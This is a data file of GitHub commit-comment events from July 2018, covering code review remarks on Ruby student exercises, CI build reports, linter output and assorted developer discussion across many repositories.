{"id":"7985787278","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29756642,"position":null,"line":null,"path":null,"commit_id":"bda1957cfaef08bf2f5c5971c4dc9077e0ccdc37","created_at":"2018-07-18T22:20:03Z","updated_at":"2018-07-18T22:20:03Z","author_association":"COLLABORATOR","body":"A couple of other notes:\r\n  1)  The conversion from cf32 to ci4 in `FDomainOp` may be sub-optimal, i.e., lots of clipping in the ci4 data.  It's hard to tell from casual inspection because I'm not fluent in packed ci4.\r\n  2)  I tried accumulating the images in `MOFFCorrelatorOp` but ended up with bad performance so I dropped it.  My approach was to use a transpose+`matmul()` to get the accumulation and all of the polarization products at once.\r\n  3)  We should really consider adding in the `ProcLog` information into the blocks that do not have it so that we can get a better idea of performance."}},"created_at":"2018-07-18T22:20:03Z"}
{"id":"7985789585","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29756650,"position":9,"line":9,"path":"route.rb","commit_id":"381a6f49d6f61433349472053d28503bbce1cfb0","created_at":"2018-07-18T22:20:40Z","updated_at":"2018-07-18T22:20:40Z","author_association":"NONE","body":"лучше сделать проще:\r\nна вход 2 аргумента: start_station, terminal_station\r\nесли оба заданы, и они станция - сохраняем их в нужные инстанс-переменные, кладем их в @full_path \r\nвсё) 4 строки, и никаких лишних методов"}},"created_at":"2018-07-18T22:20:40Z"}
{"id":"7985790332","type":"CommitCommentEvent","actor":{"login":"jmansour"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29756652,"position":null,"line":null,"path":null,"commit_id":"c1bd01df5b4115a4e95c4a367be1d1da40d6954b","created_at":"2018-07-18T22:20:53Z","updated_at":"2018-07-18T22:20:53Z","author_association":"CONTRIBUTOR","body":"It's probably not necessary here, although you'd have to update 192 to grab the `fn` off the force vec.  In some places (if I recall correctly) we need to do this to ensure we retain a reference to the object, else Python goes ahead and destroys them (as it is unaware they are being used in the C layer). "}},"created_at":"2018-07-18T22:20:53Z"}
{"id":"7985791080","type":"CommitCommentEvent","actor":{"login":"wrathsoffire76"},"repo":{"name":"Cease-and-DeSwitch/fusee-launcher"},"payload":{"comment":{"id":29756654,"position":null,"line":null,"path":null,"commit_id":"265e8f3e1987751ec41db6f1946d132b296aba43","created_at":"2018-07-18T22:21:05Z","updated_at":"2018-07-18T22:21:05Z","author_association":"NONE","body":"Why is Schala removed?"}},"created_at":"2018-07-18T22:21:05Z"}
{"id":"7985791489","type":"CommitCommentEvent","actor":{"login":"RoyEJohnson"},"repo":{"name":"openstax/os-webview"},"payload":{"comment":{"id":29756657,"position":null,"line":null,"path":null,"commit_id":"14ea78ae297c88227caa81000aacd2c9b517b54d","created_at":"2018-07-18T22:21:11Z","updated_at":"2018-07-18T22:21:11Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Adoption Form \"None\" Tech Option - UPDATED](https://trello.com/c/zwNVZh3o/783-adoption-form-none-tech-option-updated)"}},"created_at":"2018-07-18T22:21:11Z"}
{"id":"7985793207","type":"CommitCommentEvent","actor":{"login":"ajinkyakhoche"},"repo":{"name":"ajinkyakhoche/planets"},"payload":{"comment":{"id":29756666,"position":1,"line":1,"path":"read_me.txt","commit_id":"6b6fa1a980ec10ea62fc37995c028048bb9f0d18","created_at":"2018-07-18T22:21:40Z","updated_at":"2018-07-18T22:21:40Z","author_association":"OWNER","body":"Test of a markdown comment"}},"created_at":"2018-07-18T22:21:40Z"}
{"id":"7985794058","type":"CommitCommentEvent","actor":{"login":"kerastinell"},"repo":{"name":"kerastinell/Derpibooru"},"payload":{"comment":{"id":29756673,"position":null,"line":null,"path":null,"commit_id":"009ccfe3b4b58d55717662fea63b01caa92b8996","created_at":"2018-07-18T22:21:54Z","updated_at":"2018-07-18T22:21:54Z","author_association":"OWNER","body":"Derpibooru's page layout has changed. When opening any post, the old code was crashing with NPE, because `descr.html()` was returning `null`. This small fix makes opening the post possible again."}},"created_at":"2018-07-18T22:21:54Z"}
{"id":"7985794085","type":"CommitCommentEvent","actor":{"login":"RoyEJohnson"},"repo":{"name":"openstax/os-webview"},"payload":{"comment":{"id":29756674,"position":null,"line":null,"path":null,"commit_id":"6193f804ac7cac407bb5f309b9a7c6a121590a27","created_at":"2018-07-18T22:21:55Z","updated_at":"2018-07-18T22:21:55Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Interest form lead in salesforce has blank 'adoption stage'](https://trello.com/c/06Kxq2Os/787-interest-form-lead-in-salesforce-has-blank-adoption-stage)"}},"created_at":"2018-07-18T22:21:55Z"}
{"id":"7985794339","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756676,"position":13,"line":13,"path":"lesson1/triangle.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:21:59Z","updated_at":"2018-07-18T22:21:59Z","author_association":"NONE","body":"Кстати, если треугольник равносторонний, то дальнейшее выполнение программы бессмысленно. Выполнение следует прервать, потому-что равносторонний треугольник не будет прямоугольным"}},"created_at":"2018-07-18T22:21:59Z"}
{"id":"7985794631","type":"CommitCommentEvent","actor":{"login":"bdjenkin"},"repo":{"name":"bdjenkin/omdb-search"},"payload":{"comment":{"id":29756678,"position":null,"line":null,"path":null,"commit_id":"e9acb6f72697c909cf0825956e8a9ff93d4f36fe","created_at":"2018-07-18T22:22:04Z","updated_at":"2018-07-18T22:22:04Z","author_association":"OWNER","body":"Removed Search component. Rendering Movies in App now with support for empty query."}},"created_at":"2018-07-18T22:22:04Z"}
{"id":"7985796293","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29756681,"position":42,"line":42,"path":"route.rb","commit_id":"381a6f49d6f61433349472053d28503bbce1cfb0","created_at":"2018-07-18T22:22:31Z","updated_at":"2018-07-18T22:22:31Z","author_association":"NONE","body":"Вот тут не нужен map, тут надо использовать each\r\n.map используется, когда мы хотим получим новый массив, являющийся результатом действий над старым. \r\nнапример ['a', 'b', 'c'].map{|char| char.capitalize} вернет нам новый массив из больших букв. \r\n"}},"created_at":"2018-07-18T22:22:31Z"}
{"id":"7985796779","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756686,"position":null,"line":null,"path":null,"commit_id":"2d1352d9897d84a97d737a2581f4cae47a53a9b2","created_at":"2018-07-18T22:22:39Z","updated_at":"2018-07-18T22:22:39Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - i386-Windows-7-VisualStudio-14: OK (2945 of 2945 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T22:22:39Z"}
{"id":"7985797455","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756689,"position":15,"line":15,"path":"lesson1/triangle.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:22:50Z","updated_at":"2018-07-18T22:22:50Z","author_association":"NONE","body":"А вот проверку на равнобедренность по ТЗ нужно делать только для прямоугольного треугольника"}},"created_at":"2018-07-18T22:22:50Z"}
{"id":"7985797788","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29756691,"position":1,"line":1,"path":"_CompileProject.bat","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:22:56Z","updated_at":"2018-07-18T22:22:56Z","author_association":"OWNER","body":"gitignore this"}},"created_at":"2018-07-18T22:22:56Z"}
{"id":"7985798143","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29756694,"position":1,"line":1,"path":"_LocalRepoInstall.bat","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:23:03Z","updated_at":"2018-07-18T22:23:03Z","author_association":"OWNER","body":"gitignore this"}},"created_at":"2018-07-18T22:23:03Z"}
{"id":"7985821032","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29756760,"position":24,"line":24,"path":"station.rb","commit_id":"381a6f49d6f61433349472053d28503bbce1cfb0","created_at":"2018-07-18T22:29:28Z","updated_at":"2018-07-18T22:29:28Z","author_association":"NONE","body":"вот тут с методом беда. \r\n\r\nРекомендую создавать поезда с type равным :cargo, :pass\r\nс символами удобно работать. \r\n\r\nНо даже если там будут строки. Я создал 3 поезда с типом :cargo, 1 c типом :pass\r\nОтправил их на станцию\r\nХотел получил список поездов с типом cargo\r\nПрограмма просто вышла) \r\n```\r\nst\r\n => #<Station:0x00007f9a820638c0 @name=:msk, @trains=[]> \r\n2.5.1 :012 > st.arrival tr1\r\n => [#<Train:0x00007f9a82084b38 @num=3, @type=:cargo, @waggonage=0, @speed=0>] \r\n2.5.1 :013 > st.arrival tr2\r\n => [#<Train:0x00007f9a82084b38 @num=3, @type=:cargo, @waggonage=0, @speed=0>, #<Train:0x00007f9a83047ea8 @num=2, @type=:cargo, @waggonage=0, @speed=0>] \r\n2.5.1 :014 > st.arrival tr3\r\n => [#<Train:0x00007f9a82084b38 @num=3, @type=:cargo, @waggonage=0, @speed=0>, #<Train:0x00007f9a83047ea8 @num=2, @type=:cargo, @waggonage=0, @speed=0>, #<Train:0x00007f9a82075bd8 @num=3, @type=:cargo, @waggonage=0, @speed=0>] \r\n2.5.1 :015 > st.arrival tr4\r\n => [#<Train:0x00007f9a82084b38 @num=3, @type=:cargo, @waggonage=0, @speed=0>, #<Train:0x00007f9a83047ea8 @num=2, @type=:cargo, @waggonage=0, @speed=0>, #<Train:0x00007f9a82075bd8 @num=3, @type=:cargo, @waggonage=0, @speed=0>, #<Train:0x00007f9a819c2de0 @num=4, @type=:pass, @waggonage=0, @speed=0>] \r\n2.5.1 :016 > \r\n2.5.1 :017 > \r\n2.5.1 :018 > st.trains\r\n => [#<Train:0x00007f9a82084b38 @num=3, @type=:cargo, @waggonage=0, @speed=0>, #<Train:0x00007f9a83047ea8 @num=2, @type=:cargo, @waggonage=0, @speed=0>, #<Train:0x00007f9a82075bd8 @num=3, @type=:cargo, @waggonage=0, @speed=0>, #<Train:0x00007f9a819c2de0 @num=4, @type=:pass, @waggonage=0, @speed=0>] \r\n2.5.1 :019 > st.trains.count\r\n => 4 \r\n2.5.1 :020 > st.trains_count(:cargo)\r\nНа станции msk поездов типа cargo нет.\r\n\r\n```\r\n\r\n\r\n"}},"created_at":"2018-07-18T22:29:28Z"}
{"id":"7985822371","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/cEPs"},"payload":{"comment":{"id":29756764,"position":null,"line":null,"path":null,"commit_id":"c0a539352b66ff1ebeddd7e9625794e5a518e916","created_at":"2018-07-18T22:29:50Z","updated_at":"2018-07-18T22:29:50Z","author_association":"NONE","body":"Comment on c0a539352b66ff1ebeddd7e9625794e5a518e916.\n\nThere are 11 results for the section spacing. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 41 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 82 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 108 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 117 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 135 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 149 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 284 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 365 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 404 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 424 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | cEP-0028.md | 426 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-18T22:29:50Z"}
{"id":"7985823316","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"MinecraftForge/MCPConfig"},"payload":{"comment":{"id":29756769,"position":null,"line":null,"path":null,"commit_id":"e161229b4a19663dc59db608bda61c35c128e51f","created_at":"2018-07-18T22:30:06Z","updated_at":"2018-07-18T22:30:06Z","author_association":"NONE","body":":tada:"}},"created_at":"2018-07-18T22:30:06Z"}
{"id":"7985825814","type":"CommitCommentEvent","actor":{"login":"B50Corei5"},"repo":{"name":"CandyDevices/device_xiaomi_mido"},"payload":{"comment":{"id":29756774,"position":null,"line":null,"path":null,"commit_id":"1b66359aa7b8c2aab532b3209017c31a9c882f70","created_at":"2018-07-18T22:30:44Z","updated_at":"2018-07-18T22:30:44Z","author_association":"NONE","body":"Aren't you meant to never do this?"}},"created_at":"2018-07-18T22:30:44Z"}
{"id":"7985830779","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29756793,"position":44,"line":44,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:32:08Z","updated_at":"2018-07-18T22:32:08Z","author_association":"OWNER","body":"I'd recommend specifying defaults global config options in general. They are rarely needed, but its nice to have fallback behavior in case someone missspells the config option, messes up permissions for the config file, accidentally deletes it or something else. You can do so for all types by just adding the default as second parameter, so for example `config.getBoolean(\"allowDebugLogging\", false);`"}},"created_at":"2018-07-18T22:32:08Z"}
{"id":"7985835213","type":"CommitCommentEvent","actor":{"login":"PlasmaPower"},"repo":{"name":"isislovecruft/ed25519-dalek"},"payload":{"comment":{"id":29756806,"position":56,"line":920,"path":"src/ed25519.rs","commit_id":"eaf8411276ba2aa949c7bc3b7a0fdc7a120d69dc","created_at":"2018-07-18T22:33:19Z","updated_at":"2018-07-18T22:33:19Z","author_association":"NONE","body":"Why collect these two into a vector? They're only used once."}},"created_at":"2018-07-18T22:33:19Z"}
{"id":"7985835429","type":"CommitCommentEvent","actor":{"login":"ae6xe"},"repo":{"name":"aredn/aredn_ar71xx"},"payload":{"comment":{"id":29756808,"position":null,"line":null,"path":null,"commit_id":"accca49945a09c83aca0e844b2650fb55b9c1790","created_at":"2018-07-18T22:33:22Z","updated_at":"2018-07-18T22:33:22Z","author_association":"CONTRIBUTOR","body":"jason,  what's your call sign?  See https://github.com/aredn/aredn_ar71xx/pull/80\r\n "}},"created_at":"2018-07-18T22:33:22Z"}
{"id":"7985838521","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29756813,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-18T22:34:13Z","updated_at":"2018-07-18T22:34:13Z","author_association":"MEMBER","body":"@hvlad you asked for new message code and at same time points the problem with new client and old server. But with new message, old client will not understand new message from new server, which is bad as well. I don't see we dealing with these situations yet. So we have bad situations in both cases."}},"created_at":"2018-07-18T22:34:13Z"}
{"id":"7985838762","type":"CommitCommentEvent","actor":{"login":"isonKathy1975"},"repo":{"name":"SU18-CIS126FIS/TimothySpeareGrader"},"payload":{"comment":{"id":29756814,"position":null,"line":null,"path":null,"commit_id":"cf7b89283136630bf652724eabcad9b21bb879a1","created_at":"2018-07-18T22:34:18Z","updated_at":"2018-07-18T22:34:18Z","author_association":"NONE","body":"You did a fine job Timothy!  Wish more students would explore this world!!"}},"created_at":"2018-07-18T22:34:18Z"}
{"id":"7985838926","type":"CommitCommentEvent","actor":{"login":"kunalsrkr"},"repo":{"name":"kunalsrkr/Automatic_Vehicle_Movement_Detection_System"},"payload":{"comment":{"id":29756815,"position":2,"line":2,"path":"README.md","commit_id":"be4720fb59a8dff58f566906b34051b849490d35","created_at":"2018-07-18T22:34:21Z","updated_at":"2018-07-18T22:34:21Z","author_association":"OWNER","body":"System Requirement: \r\n\r\n1. python 3.5\r\n\r\n- [ ] gsh"}},"created_at":"2018-07-18T22:34:21Z"}
{"id":"7985839202","type":"CommitCommentEvent","actor":{"login":"PlasmaPower"},"repo":{"name":"isislovecruft/ed25519-dalek"},"payload":{"comment":{"id":29756816,"position":33,"line":897,"path":"src/ed25519.rs","commit_id":"eaf8411276ba2aa949c7bc3b7a0fdc7a120d69dc","created_at":"2018-07-18T22:34:26Z","updated_at":"2018-07-18T22:34:26Z","author_association":"NONE","body":"I think these arguments should be `AsRef<[PublicKey]>` or `IntoIterator<&PublicKey>` for arguments where that works."}},"created_at":"2018-07-18T22:34:26Z"}
{"id":"7985840085","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29756817,"position":null,"line":null,"path":null,"commit_id":"ea4f7a6994ca9df4d8c89e3c3ee57fc4fd5d32f0","created_at":"2018-07-18T22:34:40Z","updated_at":"2018-07-18T22:34:40Z","author_association":"OWNER","body":"This should be considered a display of the new effects system, besides being an example of an add-on."}},"created_at":"2018-07-18T22:34:40Z"}
{"id":"7985841393","type":"CommitCommentEvent","actor":{"login":"vladimirblokhin"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756821,"position":63,"line":29,"path":"Lesson_1/r_triangle.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T22:35:02Z","updated_at":"2018-07-18T22:35:02Z","author_association":"OWNER","body":"@VladFiliucov  Но ведь в условии не сказано, что проверки должны быть скомбинированы?\r\nЭта проверка отрабатывает во всех случаях, если треугольник не равносторонний. \r\nЕсли и для равностороннего треугольника нужно выводить то, что он равнобедренный, то достаточно ведь просто в puts на 17 строке это дописать."}},"created_at":"2018-07-18T22:35:02Z"}
{"id":"7985843430","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/datacube-feedstock"},"payload":{"comment":{"id":29756830,"position":null,"line":null,"path":null,"commit_id":"3275fa100f1bb9ac529196eea6d2467070830725","created_at":"2018-07-18T22:35:36Z","updated_at":"2018-07-18T22:35:36Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @andrewdhicks, @gypsybojangles were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @andrewdhicks, @gypsybojangles were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-18T22:35:36Z"}
{"id":"7985845814","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29756835,"position":null,"line":null,"path":null,"commit_id":"7a559bd6577dcc0ec6bde70a6d5b0c3288218c07","created_at":"2018-07-18T22:36:18Z","updated_at":"2018-07-18T22:36:18Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-419](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-419).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-419-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-18T22:36:18Z"}
{"id":"7985847073","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756843,"position":17,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T22:36:41Z","updated_at":"2018-07-18T22:36:41Z","author_association":"NONE","body":"Это легко проверить. Запускаем irb\r\n```\r\n2.1.3 :005 > Math.sqrt(-2)\r\nMath::DomainError: Numerical argument is out of domain - \"sqrt\"\r\n\tfrom (irb):5:in `sqrt'\r\n\tfrom (irb):5\r\n\tfrom /Users/vladislavfiliucov/.rvm/rubies/ruby-2.1.3/bin/irb:11:in `<main>'\r\n2.1.3 :006 >\r\n```\r\nПотому-что нельзя брать корень из отрицательного числа. Так-что это выражение, должно быть в ветке, где d не будет меньше 0. И это кстати единственная ветка, где квадратный корень используется"}},"created_at":"2018-07-18T22:36:41Z"}
{"id":"7985851433","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29756855,"position":4,"line":3,"path":"Lesson1/area_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:37:58Z","updated_at":"2018-07-18T22:37:58Z","author_association":"NONE","body":"да, только можно не использовать chomp, если дальше to_i. Потому-что to_i и to_f сами убирают символ новой строки"}},"created_at":"2018-07-18T22:37:58Z"}
{"id":"7985851905","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29756858,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-18T22:38:06Z","updated_at":"2018-07-18T22:38:06Z","author_association":"NONE","body":"The framework is empty, so I started a LTC test for you here: http://tests.stockfishchess.org/tests/view/5b4fc0ef0ebc5902bdb7ae0e\r\n\r\nI hope this is OK.  Good luck!"}},"created_at":"2018-07-18T22:38:06Z"}
{"id":"7985854759","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29756865,"position":9,"line":8,"path":"Lesson1/area_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:39:00Z","updated_at":"2018-07-18T22:39:00Z","author_association":"NONE","body":"рекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```\r\nпри этом оператор возведения в степень не рекомендуется выделять пробелами\r\n```\r\n    c**2   # хорошо\r\n    c ** 2 # плохо\r\n```"}},"created_at":"2018-07-18T22:39:00Z"}
{"id":"7985856137","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756867,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T22:39:26Z","updated_at":"2018-07-18T22:39:26Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2982 of 2982 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T22:39:26Z"}
{"id":"7985856490","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29756869,"position":49,"line":49,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T22:39:33Z","updated_at":"2018-07-18T22:39:33Z","author_association":"OWNER","body":"People _really_ like to break configs. You should make it so whatever happens in the config, your plugin should never explode. This includes checking that sections actually exist. In this case if `makeEnchantable` doesn't exist (and is null), attempting to iterate over it will throw a NullPointerException which makes the entire plugin enabling stop and break at this point. \r\n\r\nIt is completly fine to just say \"This config is broken, I'm not gonna continue here\", but you should do so explitcitly,. Especially because a NPE thrown during config parsing is impossible to fix unless the user can read the code himself to find the source of the issue (which shouldnt be necessary)."}},"created_at":"2018-07-18T22:39:33Z"}
{"id":"7985859164","type":"CommitCommentEvent","actor":{"login":"tonihele"},"repo":{"name":"tonihele/OpenKeeper"},"payload":{"comment":{"id":29756873,"position":null,"line":null,"path":null,"commit_id":"0a444ab66c9fb49c700aa1966e8e3c789ab2a106","created_at":"2018-07-18T22:40:22Z","updated_at":"2018-07-18T22:40:22Z","author_association":"OWNER","body":"Fug, I don't know why all of a sudden these, apparently end of line changes, started to come... Annoying"}},"created_at":"2018-07-18T22:40:22Z"}
{"id":"7985859246","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29756874,"position":10,"line":9,"path":"Lesson1/area_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:40:24Z","updated_at":"2018-07-18T22:40:24Z","author_association":"NONE","body":"там плюс не нужен. Это можно написать одной строкой. Интерполяция подхватится в любой строке которая определена через двойные кавычки"}},"created_at":"2018-07-18T22:40:24Z"}
{"id":"7985859875","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29756877,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-18T22:40:36Z","updated_at":"2018-07-18T22:40:36Z","author_association":"MEMBER","body":"Probably, isc_random could be used here ? Or, we could add that new code into v3 also... \r\nBtw, are you going to backport this fix into v3 ?"}},"created_at":"2018-07-18T22:40:36Z"}
{"id":"7985861511","type":"CommitCommentEvent","actor":{"login":"MisaelCalvillo"},"repo":{"name":"MisaelCalvillo/w2schools-angularjs"},"payload":{"comment":{"id":29756884,"position":null,"line":null,"path":null,"commit_id":"7c0dc85164c9724290de8e89d762dfbabafdf9a6","created_at":"2018-07-18T22:41:07Z","updated_at":"2018-07-18T22:41:07Z","author_association":"OWNER","body":"![screen shot 2018-07-18 at 5 40 50 pm](https://user-images.githubusercontent.com/13053013/42911716-bf85fa08-8ab1-11e8-8230-0d23708c8d4c.png)\r\n"}},"created_at":"2018-07-18T22:41:07Z"}
{"id":"7985862903","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29756890,"position":4,"line":4,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-18T22:41:33Z","updated_at":"2018-07-18T22:41:33Z","author_association":"NONE","body":"Нужно преобразовывать числа в вещественные, т.к. во-первых, нигде не сказано, что коэффициенты могут быть только целыми, а во-вторых, при делении может получиться неверный результат, т.к. при делении целых чисел дробная часть отбрасывается"}},"created_at":"2018-07-18T22:41:33Z"}
{"id":"7985863354","type":"CommitCommentEvent","actor":{"login":"Shahav"},"repo":{"name":"DxCx/plugin.video.9anime"},"payload":{"comment":{"id":29756891,"position":2,"line":1,"path":"addon.xml","commit_id":"f00e36beaa806ebb3bc19c6fc2d61bd4b32dbda8","created_at":"2018-07-18T22:41:41Z","updated_at":"2018-07-18T22:41:41Z","author_association":"NONE","body":"How to configure 9Anime so it works great."}},"created_at":"2018-07-18T22:41:41Z"}
{"id":"7985863595","type":"CommitCommentEvent","actor":{"login":"regisphilibert"},"repo":{"name":"gohugoio/hugoDocs"},"payload":{"comment":{"id":29756892,"position":null,"line":null,"path":null,"commit_id":"a4fa0d1d641b2b3e27a91ae8b1a0a29be3c42ddf","created_at":"2018-07-18T22:41:46Z","updated_at":"2018-07-18T22:41:46Z","author_association":"CONTRIBUTOR","body":"I’m sorry I let so many typos slip... And thanks for those commas fixes. \r\n\r\nOne thing I am not sure of is the pluralization of “each ... methods”.  (https://www.google.ca/amp/s/dictionary.cambridge.org/fr/amp/grammaire-britannique/each)\r\n\r\nAgain thank you so much!"}},"created_at":"2018-07-18T22:41:46Z"}
